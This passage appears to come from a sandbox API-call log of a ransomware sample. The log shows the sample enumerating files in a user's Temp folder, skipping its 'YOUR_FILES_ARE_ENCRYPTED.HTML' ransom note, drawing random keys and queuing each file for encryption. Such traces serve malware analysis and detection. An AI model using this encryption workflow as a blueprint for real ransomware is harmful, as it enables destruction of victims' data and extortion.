lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0164.025] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0164.027] CloseHandle (hObject=0x598) returned 1 [0164.027] GetProcessHeap () returned 0x270000 [0164.028] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0164.036] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xab15a560, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xab15a560, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Temp", cAlternateFileName="")) returned 1 [0164.036] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp") returned 42 [0164.036] GetProcessHeap () returned 0x270000 [0164.036] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0164.038] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp" [0164.038] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\*" [0164.038] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\*", lpFindFileData=0x4ebd848 | out: 
lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xab15a560, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xaccba260, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0164.038] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xab15a560, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xaccba260, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0164.038] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2e6860, ftCreationTime.dwHighDateTime=0x1d7dcdc, ftLastAccessTime.dwLowDateTime=0x1ea39e0, ftLastAccessTime.dwHighDateTime=0x1d7e072, ftLastWriteTime.dwLowDateTime=0x1ea39e0, ftLastWriteTime.dwHighDateTime=0x1d7e072, nFileSizeHigh=0x0, nFileSizeLow=0x77b5, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="-vIVzxE.gif", cAlternateFileName="")) returned 1 [0164.038] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\-vIVzxE.gif") returned 54 [0164.038] lstrcmpW (lpString1="-vIVzxE.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.038] PathFindExtensionW (pszPath="-vIVzxE.gif") returned=".gif" [0164.038] lstrlenW (lpString=".gif") returned 4 [0164.038] PathFindExtensionW (pszPath="-vIVzxE.gif") returned=".gif" [0164.038] SystemFunction036 (in: 
RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\-vIVzxE.gif" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\-vivzxe.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x4a8 [0164.041] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=30645) returned 1 [0164.041] GetProcessHeap () returned 0x270000 [0164.041] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0164.045] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="DE") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="E5") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="75") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="B9") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="BB") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="02") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="57") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="95") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="EF") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="9A") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="3F") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="0B") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="92") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="51") returned 2 [0164.045] wsprintfW (in: 
param_1=0x4ebd762, param_2="%02X" | out: param_1="32") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="F8") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="D3") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="BD") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="49") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="9A") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="E0") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="E4") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="6D") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="AA") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="FC") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="C1") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="97") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="7C") returned 2 [0164.045] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="F5") returned 2 [0164.046] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="7A") returned 2 [0164.046] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="09") returned 2 [0164.046] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="5C") returned 2 [0164.046] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\-vIVzxE.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\-vIVzxE.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\-vIVzxE.gif" [0164.046] CreateIoCompletionPort (FileHandle=0x4a8, ExistingCompletionPort=0x3a0, 
CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.046] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0164.046] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8d857f10, ftCreationTime.dwHighDateTime=0x1d7d72f, ftLastAccessTime.dwLowDateTime=0xa3a2bdb0, ftLastAccessTime.dwHighDateTime=0x1d7e258, ftLastWriteTime.dwLowDateTime=0xa3a2bdb0, ftLastWriteTime.dwHighDateTime=0x1d7e258, nFileSizeHigh=0x0, nFileSizeLow=0x95a8, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="3xh08hMVFrSWoJ.ppt", cAlternateFileName="3XH08H~1.PPT")) returned 1 [0164.046] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\3xh08hMVFrSWoJ.ppt") returned 61 [0164.046] lstrcmpW (lpString1="3xh08hMVFrSWoJ.ppt", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.047] PathFindExtensionW (pszPath="3xh08hMVFrSWoJ.ppt") returned=".ppt" [0164.047] lstrlenW (lpString=".ppt") returned 4 [0164.047] PathFindExtensionW (pszPath="3xh08hMVFrSWoJ.ppt") returned=".ppt" [0164.047] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.047] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\3xh08hMVFrSWoJ.ppt" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\3xh08hmvfrswoj.ppt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0164.047] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=38312) returned 1 [0164.047] GetProcessHeap () returned 0x270000 [0164.047] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75f0050 
[0164.051] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="BB") returned 2 [0164.051] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="47") returned 2 [0164.051] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="7D") returned 2 [0164.051] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="B4") returned 2 [0164.051] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="86") returned 2 [0164.051] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="4C") returned 2 [0164.051] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="87") returned 2 [0164.051] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="64") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="D9") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="E0") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="E0") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="73") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="D2") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="98") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="3F") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="30") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="7C") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="43") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="92") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="08") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="0D") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: 
param_1="6F") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="68") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="3A") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="F6") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="29") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="2C") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="06") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="92") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="AF") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="E0") returned 2 [0164.052] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="46") returned 2 [0164.053] lstrcpyW (in: lpString1=0x7600104, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\3xh08hMVFrSWoJ.ppt" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\3xh08hMVFrSWoJ.ppt") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\3xh08hMVFrSWoJ.ppt" [0164.053] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x75f0050, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.053] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75f0050, lpOverlapped=0x75f0050) returned 1 [0164.053] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1c5020b0, ftCreationTime.dwHighDateTime=0x1d7e432, ftLastAccessTime.dwLowDateTime=0xe5480c40, ftLastAccessTime.dwHighDateTime=0x1d7e544, ftLastWriteTime.dwLowDateTime=0xe5480c40, ftLastWriteTime.dwHighDateTime=0x1d7e544, nFileSizeHigh=0x0, nFileSizeLow=0x12d64, 
dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="7 nypZ.flv", cAlternateFileName="7NYPZ~1.FLV")) returned 1 [0164.053] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\7 nypZ.flv") returned 53 [0164.053] lstrcmpW (lpString1="7 nypZ.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.053] PathFindExtensionW (pszPath="7 nypZ.flv") returned=".flv" [0164.053] lstrlenW (lpString=".flv") returned 4 [0164.053] PathFindExtensionW (pszPath="7 nypZ.flv") returned=".flv" [0164.053] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.053] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\7 nypZ.flv" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\7 nypz.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0164.054] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=77156) returned 1 [0164.054] GetProcessHeap () returned 0x270000 [0164.054] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0164.059] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="3E") returned 2 [0164.059] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="D4") returned 2 [0164.059] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="48") returned 2 [0164.059] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="6F") returned 2 [0164.059] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="EA") returned 2 [0164.059] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="C2") returned 2 [0164.059] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="78") returned 2 [0164.059] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | 
out: param_1="B6") returned 2 [0164.059] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="3A") returned 2 [0164.059] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="EE") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="46") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="CB") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="97") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="6C") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="52") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="F5") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="25") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="DD") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="33") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="84") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="51") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="E4") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="36") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="38") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="D2") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="BC") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="35") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="63") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="A6") returned 2 [0164.060] wsprintfW (in: 
param_1=0x4ebd79e, param_2="%02X" | out: param_1="D0") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="42") returned 2 [0164.060] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="5B") returned 2 [0164.061] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\7 nypZ.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\7 nypZ.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\7 nypZ.flv" [0164.061] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.061] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0164.073] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11285520, ftCreationTime.dwHighDateTime=0x1d7e3e9, ftLastAccessTime.dwLowDateTime=0xdf1e05e0, ftLastAccessTime.dwHighDateTime=0x1d7e747, ftLastWriteTime.dwLowDateTime=0xdf1e05e0, ftLastWriteTime.dwHighDateTime=0x1d7e747, nFileSizeHigh=0x0, nFileSizeLow=0x154a3, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="ArGdil6.wav", cAlternateFileName="")) returned 1 [0164.073] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\ArGdil6.wav") returned 54 [0164.073] lstrcmpW (lpString1="ArGdil6.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.073] PathFindExtensionW (pszPath="ArGdil6.wav") returned=".wav" [0164.073] lstrlenW (lpString=".wav") returned 4 [0164.073] PathFindExtensionW (pszPath="ArGdil6.wav") returned=".wav" [0164.073] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.073] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\ArGdil6.wav" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\argdil6.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0164.074] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=87203) returned 1 [0164.074] GetProcessHeap () returned 0x270000 [0164.074] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0164.075] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="E1") returned 2 [0164.075] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="7C") returned 2 [0164.075] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="EC") returned 2 [0164.075] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="C6") returned 2 [0164.075] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="69") returned 2 [0164.075] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="CB") returned 2 [0164.075] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="9D") returned 2 [0164.075] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="93") returned 2 [0164.075] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="23") returned 2 [0164.075] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="D1") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="A2") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="60") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="E8") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="94") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="AA") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd766, 
param_2="%02X" | out: param_1="4F") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="D0") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="5E") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="9C") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="69") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="C2") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="77") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="B6") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="98") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="F5") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="24") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="D6") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="A1") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="73") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="D5") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="43") returned 2 [0164.076] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="01") returned 2 [0164.077] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\ArGdil6.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\ArGdil6.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\ArGdil6.wav" [0164.077] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.078] PostQueuedCompletionStatus 
(CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0164.090] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7d22c140, ftCreationTime.dwHighDateTime=0x1d7de3d, ftLastAccessTime.dwLowDateTime=0xb9c03b00, ftLastAccessTime.dwHighDateTime=0x1d7e4dc, ftLastWriteTime.dwLowDateTime=0xb9c03b00, ftLastWriteTime.dwHighDateTime=0x1d7e4dc, nFileSizeHigh=0x0, nFileSizeLow=0x119cd, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="bUkj-n.m4a", cAlternateFileName="")) returned 1 [0164.090] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUkj-n.m4a") returned 53 [0164.090] lstrcmpW (lpString1="bUkj-n.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.090] PathFindExtensionW (pszPath="bUkj-n.m4a") returned=".m4a" [0164.090] lstrlenW (lpString=".m4a") returned 4 [0164.090] PathFindExtensionW (pszPath="bUkj-n.m4a") returned=".m4a" [0164.090] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUkj-n.m4a" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bukj-n.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0164.091] GetFileSizeEx (in: 